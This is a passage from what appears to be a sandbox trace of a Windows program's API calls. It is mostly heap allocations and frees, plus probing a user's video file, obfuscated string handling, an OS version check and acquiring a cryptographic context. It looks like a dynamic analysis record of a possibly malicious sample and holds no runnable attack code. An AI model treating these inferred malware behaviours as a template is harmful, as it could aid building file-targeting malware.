0x24b1908 [0258.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0258.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0258.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0258.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0258.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.527] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/EzPWeTUYQ0o54TxyD5.mkv", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9fddf00, ftCreationTime.dwHighDateTime=0x1d4d364, ftLastAccessTime.dwLowDateTime=0xbed2aea0, ftLastAccessTime.dwHighDateTime=0x1d4c7ea, ftLastWriteTime.dwLowDateTime=0xbed2aea0, ftLastWriteTime.dwHighDateTime=0x1d4c7ea, nFileSizeHigh=0x0, nFileSizeLow=0x15e14, dwReserved0=0x7a0530, dwReserved1=0x11abe, cFileName="EzPWeTUYQ0o54TxyD5.mkv", cAlternateFileName="EZPWET~1.MKV")) returned 0xaa57a0 [0258.527] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0258.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.528] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0258.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0258.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0258.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0258.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.530] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.530] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.530] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.530] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.530] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.531] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.531] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.531] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.531] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.531] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.531] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.532] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.533] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0258.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.533] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.533] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.533] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0258.533] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.533] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0258.534] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.534] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.534] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.534] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.534] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.534] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.534] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0258.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0258.534] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.534] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.534] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.534] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.534] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.534] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.534] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.535] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0258.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0258.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0258.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0258.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0258.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0258.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0258.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0258.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | 